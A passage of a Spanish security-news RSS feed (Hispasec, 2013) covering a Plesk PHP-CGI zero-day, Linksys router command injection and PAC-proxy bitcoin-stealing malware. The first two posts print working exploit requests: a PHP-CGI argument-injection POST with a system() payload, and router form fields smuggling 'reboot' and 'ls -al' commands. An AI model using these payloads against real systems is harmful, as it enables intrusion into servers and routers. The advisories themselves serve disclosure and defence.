&lt;div class="MsoNormal" style="text-align: justify;"&gt;
El fallo aprovecha una directiva scriptAlias en php-cgi.conf para llegar directamente al binario de PHP en el sistema. La directiva es:&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;span style="font-family: Courier;"&gt;scriptAlias &lt;i&gt;/phppath/&lt;/i&gt; "&lt;i&gt;/usr/bin/&lt;/i&gt;"&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
Esto permite que se puedan hacer peticiones HTTP sobre /phppath/php, que serían ejecutadas /usr/bin/php. En el exploit, Kingcope pasa como parámetro de la petición una cadena en codificación URL, que decodificada:&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
&lt;span lang="EN-GB" style="font-family: Courier; mso-ansi-language: EN-GB;"&gt;POST /phppath/php?-d allow_url_include=on -d safe_mode=off –d suhosin.simulation=on -d disable_functions="" -d open_basedir=none –d auto_prepend_file=php://input -n&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
Está pasando directivas de inicio a php. Estas desactivan algunas medidas de seguridad (safe_mode=off, suhosin.simulation=on), permiten la inclusión de ficheros a través de URL, la ejecución de ficheros fuera del árbol de directorios (open_basedir=none). Finalmente, fuerza la inclusión del contenido POST en bruto que se va a pasar a continuación con auto_prepend_file=php://input -n. El contenido es:&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
&lt;span lang="EN-GB" style="font-family: Courier; mso-ansi-language: EN-GB;"&gt;User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) Content-Type: application/x-www-form-urlencoded Content-Length: 82 &amp;lt;?php echo "Content-Type:text/html\r\n\r\n";echo "OK\n";system("uname -a;id;"); ?&amp;gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
Lo que terminará ejecutando el código PHP y la llamada a system con los permisos del servidor Apache, que ejecutará comandos del sistema.&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
Este método difiere de otros similares (como el famoso &lt;a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1823"&gt;CVE-2012-1823&lt;/a&gt;, descubierto el año pasado) en que la llamada al binario de php es directa, sin utilizar ningún fichero php intermedio. En aquel caso se hacía uso de un envoltorio para php-cgi, pero ya en el artículo se indicaba que se podían obtener los mismos resultados si el binario se copiara directamente al directorio.&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://2.bp.blogspot.com/-5OF-diEMTfM/UbB75ovx_vI/AAAAAAAACmg/9AvDI65Ro1A/s1600/plesk9_box.gif" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"&gt;&lt;img border="0" src="http://2.bp.blogspot.com/-5OF-diEMTfM/UbB75ovx_vI/AAAAAAAACmg/9AvDI65Ro1A/s1600/plesk9_box.gif" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
Las versiones en las que se ha probado la vulnerabilidad son la 8.6 y varias versiones 9 de Plesk en sistemas Red Hat, CentOS y Fedora y bajo arquitecturas i386 y x86_64. No se ha probado en versiones Windows, aunque esto no significa que no sean vulnerables. La versión 11 de Plesk no está afectada.&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;b&gt;La vulnerabilidad se ha publicado solo unos días antes de que la versión 9 de Plesk acabe su ciclo de vida&lt;/b&gt; el día 9 de junio, por tanto Parallels tiene unos cuatro días para corroborar el fallo y publicar una solución, aunque también podría instar a actualizar a la versión 10 y dejar el fallo sin solucionar, lo que parece poco probable puesto que cuenta con una gran base de usuarios.&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;b&gt;Más información:&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
Plesk Apache Zeroday Remote Exploit&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;a href="http://seclists.org/fulldisclosure/2013/Jun/21"&gt;http://seclists.org/fulldisclosure/2013/Jun/21&lt;/a&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;span lang="EN-GB"&gt;Parallels Plesk Panel Lifecycle Policy&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;a href="http://www.parallels.com/support/policy/plesk-lifecycle/"&gt;&lt;span lang="EN-GB"&gt;http://www.parallels.com/support/policy/plesk-lifecycle/&lt;/span&gt;&lt;/a&gt;&lt;span lang="EN-GB"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;span lang="EN-GB"&gt;Plesk 0-Day Targets Web Servers&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;a href="http://blogs.cisco.com/security/plesk-0-day-targets-web-servers/"&gt;&lt;span lang="EN-GB"&gt;http://blogs.cisco.com/security/plesk-0-day-targets-web-servers/&lt;/span&gt;&lt;/a&gt;&lt;span lang="EN-GB"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div align="right" class="MsoNormal" style="text-align: right;"&gt;
&lt;span lang="EN-GB"&gt;Francisco López&lt;/span&gt;&lt;/div&gt;
&lt;div align="right" class="MsoNormal" style="text-align: right;"&gt;
&lt;a href="mailto:flopez@hispasec.com"&gt;&lt;span lang="EN-GB"&gt;flopez@hispasec.com&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/hispasec/zCAd/~4/vGzBw78T6_Y" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/hispasec/zCAd/~3/vGzBw78T6_Y/vulnerabilidad-en-parallels-plesk.html</link><author>noreply@blogger.com (Hispasec)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://4.bp.blogspot.com/-m8w8QphE-s8/UbBzt0gF1zI/AAAAAAAACmQ/XYqlCTesK9U/s72-c/Parallels.PNG" height="72" width="72" /><thr:total>0</thr:total><feedburner:origLink>http://unaaldia.hispasec.com/2013/06/vulnerabilidad-en-parallels-plesk.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-9000895764691586838.post-495627838972894325</guid><pubDate>Wed, 05 Jun 2013 08:52:00 +0000</pubDate><atom:updated>2013-06-05T23:54:15.255+02:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Hardware</category><category domain="http://www.blogger.com/atom/ns#">router</category><category domain="http://www.blogger.com/atom/ns#">Linksys</category><title>Inyección remota de código en routers WiFi Linksys</title><description>&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;span style="font-size: 13pt;"&gt;El
investigador Jason Leyrer, de Trustwave &lt;/span&gt;&lt;a href="http://blog.spiderlabs.com/2013/05/under-the-hood-linksys-remote-command-injection-vulnerabilities.html" style="font-size: 13pt;"&gt;ha
publicado un artículo donde analiza&lt;/a&gt;&lt;span style="font-size: 13pt;"&gt; &lt;/span&gt;&lt;b style="font-size: 13pt;"&gt;dos
fallos de seguridad en routers WiFi de la marca Linksys de Cisco&lt;/b&gt;&lt;span style="font-size: 13pt;"&gt;. Estas
vulnerabilidades permiten la ejecución de código remoto a través de la
inyección de comandos en el sistema operativo subyacente, sin necesidad de
autenticación en algunos casos. Están presentes en modelos cuyo soporte ya ha
acabado.&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
Leyrer describe &lt;a href="https://www.trustwave.com/spiderlabs/advisories/TWSL2013-008.txt"&gt;una
vulnerabilidad descubierta por él&lt;/a&gt; y &lt;a href="http://www.s3cur1ty.de/m1adv2013-004"&gt;otra por encontrada en otros
modelos del fabricante por Michael Messner&lt;/a&gt;. Se trata de sendas &lt;b&gt;inyecciones de comandos al sistema
operativo&lt;/b&gt; subyacente del router a través de la interfaz de gestión, más
concretamente en la página de diagnóstico.&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
Las vulnerabilidades aprovechan
una falta de validación en el contenido suministrado por el usuario en los
campos ping_ip y ping_size. En el primer caso, al agregar dos caracteres "&lt;i&gt;&amp;amp;&lt;/i&gt;" (ampersand) tras una IP válida
en codificación URL y seguidos del comando a ejecutar, se consigue la inyección
de comandos. Esto se traduce en una petición POST &lt;span lang="EN-GB"&gt;con parámetros. Por ejemplo:&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;span lang="EN-GB" style="font-family: Courier; mso-ansi-language: EN-GB;"&gt;submit_button=Diagnostics&amp;amp;change_action=gozila_cgi&amp;amp;submit_type=start_ping&amp;amp;action=&amp;amp;commit=0&amp;amp;ping_ip=127.0.0.1%26%26reboot&amp;amp;ping_times=5&amp;amp;ping_size=32&amp;amp;traceroute_ip=&lt;/span&gt;&lt;span lang="EN-GB"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
Es interpretada por el sistema
como:&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;span lang="EN-GB" style="font-family: Courier; mso-ansi-language: EN-GB;"&gt;ping -t 30 -c 5 -R 66560 -s
32 -f /tmp/ping.log 127.0.0.1&amp;amp;&amp;amp;reboot &amp;amp;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;b&gt;Al terminar correctamente el comando ping, se ejecuta el comando inyectado&lt;/b&gt;,
en este caso reboot, que reiniciaría el router. Los comandos inyectados con
este método no pueden contener espacios, ya que no se construirán.&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: right; margin-left: 1em; text-align: right;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-kWmyhX4VuCA/Ua78xLrrabI/AAAAAAAACmA/1VtC25jM_tA/s1600/Linksys_E1000.jpg" imageanchor="1" style="clear: right; margin-bottom: 1em; margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" src="http://3.bp.blogspot.com/-kWmyhX4VuCA/Ua78xLrrabI/AAAAAAAACmA/1VtC25jM_tA/s1600/Linksys_E1000.jpg" height="179" width="320" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;Linksys E1000&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
Esta vulnerabilidad está presente
en el modelo E1000. Los modelos E1200/E3200 sí realizan validación de este
campo y no están afectados.&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
De manera similar se podría
explotar la inyección de comandos a través del campo ping_size. Sin embargo, el
sistema añade el resto de parámetros del comando ping tras el contenido
inyectado, lo que provoca que no sea valido. Por ejemplo:&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;span lang="EN-GB" style="font-family: Courier; mso-ansi-language: EN-GB;"&gt;submit_button=Diagnostics&amp;amp;change_action=gozila_cgi&amp;amp;submit_type=start_ping&amp;amp;action=&amp;amp;commit=0&amp;amp;ping_ip=127.0.0.1&amp;amp;ping_times=5&amp;amp;ping_size=32%20127.0.0.1%26%26ls%20%2Dal&amp;amp;traceroute_ip=&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
Se ejecuta como:&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;span lang="EN-GB" style="font-family: Courier; mso-ansi-language: EN-GB;"&gt;ping -t 30 -c 5 -R 66560 -s
32 127.0.0.1&amp;amp;&amp;amp;ls -al -f /tmp/ping.log 127.0.0.1 &amp;amp;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
Lo cual no es válido. Para
solucionar esto, se puede aprovechar la restricción de tamaño en los comandos
del sistema. Si se adjuntan tras el comando una gran cantidad de caracteres
espacio codificados, el comando se truncará, dejando fuera el resto de
parámetros:&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;span lang="EN-GB" style="font-family: Courier; mso-ansi-language: EN-GB;"&gt;submit_button=Diagnostics&amp;amp;change_action=gozila_cgi&amp;amp;submit_type=start_ping&amp;amp;action=&amp;amp;commit=0&amp;amp;ping_ip=127.0.0.1&amp;amp;ping_times=5&amp;amp;ping_size=32%20127.0.0.1%26%26ls%20%2Dal%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20&amp;amp;traceroute_ip=&lt;/span&gt;&lt;span lang="EN-GB"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
En el sistema:&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;span style="font-family: Courier;"&gt;ping
-t 30 -c 5 -R 66560 -s 32 127.0.0.1&amp;amp;&amp;amp;ls -al&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;b&gt;Utilizando estos métodos, se podría conseguir una shell remota.&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
En el caso del modelo E1000, no
es necesario ningún tipo de autenticación para explotar las vulnerabilidades,
ya que el servidor HTTP no la pide. En cambio, para el resto de modelos sería
necesario autenticarse solo si el router no tiene su configuración de fábrica.&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
Leyrer señala que &lt;b&gt;de los tres modelos vulnerables probados,
sólo uno, el E1200, sigue teniendo soporte por parte del fabricante, mientras
que los otros dos (E1000 y E3200) no recibirán ninguna actualización&lt;/b&gt; que resuelva
los fallos. Para estos, recomienda desactivar la interfaz de administración,
aunque esto puede no ser suficiente para evitar un ataque cross-site request
forgery.&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;b&gt;&lt;span lang="EN-GB"&gt;Más información:&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;span lang="EN-GB"&gt;Under The Hood: Linksys Remote Command
Injection Vulnerabilities&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;a href="http://blog.spiderlabs.com/2013/05/under-the-hood-linksys-remote-command-injection-vulnerabilities.html"&gt;&lt;span lang="EN-GB"&gt;http://blog.spiderlabs.com/2013/05/under-the-hood-linksys-remote-command-injection-vulnerabilities.html&lt;/span&gt;&lt;/a&gt;&lt;span lang="EN-GB"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;span lang="EN-GB"&gt;Multiple Vulnerabilities in Linksys E1500/E2500&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;a href="http://www.s3cur1ty.de/m1adv2013-004"&gt;&lt;span lang="EN-GB"&gt;http://www.s3cur1ty.de/m1adv2013-004&lt;/span&gt;&lt;/a&gt;&lt;span lang="EN-GB"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div align="right" class="MsoNormal" style="text-align: right;"&gt;
&lt;span lang="EN-GB"&gt;Francisco López&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div align="right" class="MsoNormal" style="text-align: right;"&gt;
&lt;a href="mailto:flopez@hispasec.com"&gt;&lt;span lang="EN-GB"&gt;flopez@hispasec.com&lt;/span&gt;&lt;/a&gt;&lt;span lang="EN-GB"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;br /&gt;&lt;img src="http://feeds.feedburner.com/~r/hispasec/zCAd/~4/jAGB7Bh-pAo" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/hispasec/zCAd/~3/jAGB7Bh-pAo/inyeccion-remota-de-codigo-en-routers.html</link><author>noreply@blogger.com (Hispasec)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://3.bp.blogspot.com/-kWmyhX4VuCA/Ua78xLrrabI/AAAAAAAACmA/1VtC25jM_tA/s72-c/Linksys_E1000.jpg" height="72" width="72" /><thr:total>0</thr:total><feedburner:origLink>http://unaaldia.hispasec.com/2013/06/inyeccion-remota-de-codigo-en-routers.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-9000895764691586838.post-8944454931243007936</guid><pubDate>Tue, 04 Jun 2013 11:42:00 +0000</pubDate><atom:updated>2013-06-04T13:49:11.007+02:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">BitCoin</category><category domain="http://www.blogger.com/atom/ns#">Malware</category><category domain="http://www.blogger.com/atom/ns#">Troyanos</category><title>Nuevo malware para robar bitcoins basado en proxy</title><description>&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;span style="font-size: 13pt;"&gt;&lt;b&gt;El malware basado en proxy no es nuevo&lt;/b&gt;, pero vamos a aprovechar la circunstancia de que se &lt;a href="http://www.securelist.com/en/blog/208195033/Malicious_PACs_and_Bitcoins"&gt;ha avistado una muestra que intenta robar bitcoins con esta técnica&lt;/a&gt;para repasar en qué consisten y, sobre todo, cómo &lt;b&gt;los bitcoins y las compañías que los gestionan se pueden considerar ya prácticamente un objetivo &lt;/b&gt;en sí mismo como cualquier entidad bancaria.&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;b&gt;Los troyanos basados en proxy&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
Esta técnica se usa desde 2007. &lt;b&gt;Está basada, como tantas otras, en la redirección del usuario&lt;/b&gt;. En esta categoría entra el pharming tradicional (cambiar la resolución de dominios a nivel de sistema), el uso de "&lt;i&gt;rogue DNS&lt;/i&gt;" (cambiar los DNS de sistema), etc. El troyano basado en proxy está fundamentado en el cambio discrecional (o no) del proxy de sistema según el dominio que se quiera atacar. El tráfico pasa por el proxy del atacante y, con él, las claves y contraseñas. O bien el proxy redirige a otro lugar donde espera un clon de la página objetivo.&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;b&gt;Las técnicas basadas en proxy, son en teoría detectables por el usuario. &lt;/b&gt;Para que sea útil para el atacante, debe descifrar el tráfico TLS/SSL de alguna forma o incluso redirigir directamente al usuario a un phishing, y esto deriva en fallos en el certificado o cambios en la cadena de verificación. Pero suponen una manera efectiva de robar información a un coste similar (por bajo) al del phishing.&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;b&gt;Cómo funcionan&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;b&gt;Son&amp;nbsp; muy populares en el malware brasileño.&lt;/b&gt; Consiguen su objetivo ayudándose de una característica propia de los navegadores: el PAC (proxy autoconfiguration). Se trata de código JavaScript que, colgado en alguna URL, es descargado e interpretado por el navegador para modificar su configuración. Por ejemplo, en Internet Explorer se añade una línea en:&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://4.bp.blogspot.com/-19Uk5eg3kSQ/Ua3S7uUk3wI/AAAAAAAAClg/NS1pA2GvhZg/s1600/pac1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://4.bp.blogspot.com/-19Uk5eg3kSQ/Ua3S7uUk3wI/AAAAAAAAClg/NS1pA2GvhZg/s1600/pac1.png" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
Para automatizarlo, el troyano se encarga de, en Chrome y Firefox, modificar directamente el fichero prefs.js y en Internet Explorer, el registro correspondiente (el valor AutoConfigURL de Software\Microsoft\Windows\CurrentVersion\Internet Settings). &lt;a href="http://findproxyforurl.com/example-pac-file/"&gt;El código necesario para configurar un proxy automática yselectivamente es&lt;/a&gt;, por ejemplo:&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://3.bp.blogspot.com/-NjkRWHUsy84/Ua3TCsWwo_I/AAAAAAAAClo/2jtu-3EPZeY/s1600/pac2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://3.bp.blogspot.com/-NjkRWHUsy84/Ua3TCsWwo_I/AAAAAAAAClo/2jtu-3EPZeY/s1600/pac2.png" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
El código es bastante autoexplicativo. Aunque por supuesto, &lt;b&gt;los atacantes lo ofuscan y vuelven a ofuscar con cualquier técnica para dificultar su lectura&lt;/b&gt;. En el caso concreto detectado contra la web mtgox.com de Brasil (una reputada web de intercambio de bitcoins), los atacantes colgaron este fichero PAC real en una web que simulaba proporcionar una actualización de Java (falsa, por supuesto) como reclamo:&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://1.bp.blogspot.com/-Js4CribOrJE/Ua3TKxLllEI/AAAAAAAAClw/-FiDPfxSHGU/s1600/pac3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://1.bp.blogspot.com/-Js4CribOrJE/Ua3TKxLllEI/AAAAAAAAClw/-FiDPfxSHGU/s1600/pac3.png" height="327" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
La infección venía a su vez a través de un applet malicioso que modificaba la configuración del usuario.&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;b&gt;Malware y bitcoins&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;b&gt;Esta es una muestra más del interés que suscitan los bitcoins en el mundo del malware. &lt;/b&gt;Se puede considerar que las entidades que trabajan con esta moneda se han incorporado al conjunto de objetivos&amp;nbsp; de los troyanos bancarios. Esto viene a unirse al conjunto de malware que ataca a esta moneda en otros sentidos: Por un lado los que infectan a&amp;nbsp; usuarios para que minen (busquen) monedas sin su consentimiento y por otro los que roban la "&lt;i&gt;cartera&lt;/i&gt;" de bitcoins a los usuarios que guarden ya códigos generados en ellas, haciéndose con la llave privada que se encuentra en wallet.dat.&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;b&gt;Más información:&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
Malicious PACs and Bitcoins&lt;/div&gt;
